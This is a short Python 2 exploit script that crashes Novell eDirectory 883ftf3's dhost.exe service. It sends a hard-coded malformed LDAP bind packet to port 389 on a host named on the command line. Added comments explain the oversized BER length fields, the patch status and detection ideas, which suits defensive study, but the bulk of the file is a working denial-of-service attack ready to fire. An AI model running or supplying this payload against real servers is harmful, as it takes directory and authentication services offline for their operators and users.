#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed bind LDAP packet can crash the dhost.exe service.
# 24/03/2009 Vendor notification; patched in 885 release
#
# Notes for triage and detection (derived from this script only):
#   * Fix status: the header above states the issue is patched in the 885
#     release, so hosts still on 883ftf3 are the ones to inventory.
#   * Exposure: the packet is the first data sent on a fresh TCP connection to
#     port 389; nothing in this script authenticates beforehand.
#   * Symptom: dhost.exe stopping shortly after an inbound LDAP connection.
#   * Wire pattern: see the comments on `payload` below.
#
# Usage: script.py <host>   (Python 2; the payload is a byte string there)

import sys
from socket import AF_INET, SOCK_STREAM, socket

# 128-byte LDAP message, reproduced byte-for-byte from the original report.
# The byte sequence \x84\xFF\xFF\xFF\xFF occurs twice.  In BER, a length octet
# of 0x84 means "four length bytes follow", so each occurrence reads as a
# declared length of 0xFFFFFFFF, far larger than the enclosing message.
# NOTE(review): presumably this oversized length is what the nldap module
# mishandles; the page does not state the root cause, so treat as unconfirmed.
# A parser or network sensor can reject any element whose declared length
# exceeds the bytes remaining in the PDU.
payload = (
    # outer SEQUENCE header (0x30, length 0x7E) and the malformed length fields
    "\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
    # from the fifth byte of the next line on: ASCII text
    # "dc=uaregonnacrash,dc=com+" repeated, ending in "dc=com"
    "\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
    "\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
    "\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
    "\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
    "\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
    "\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
    # trailing \x80\x00: a context tag with zero length closes the message
    "\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
)

conn = socket(AF_INET, SOCK_STREAM)

print('connecting...')
# Host comes from the first command-line argument; port 389 is fixed.
target = (sys.argv[1], 389)
conn.connect(target)

print('sending payload...')
conn.send(payload)

# Blocking read with no timeout: waits for up to 1024 bytes of reply or for
# the peer to end the connection, then echoes whatever came back.
reply = conn.recv(1024)
print(reply)

conn.close()
print('Done!')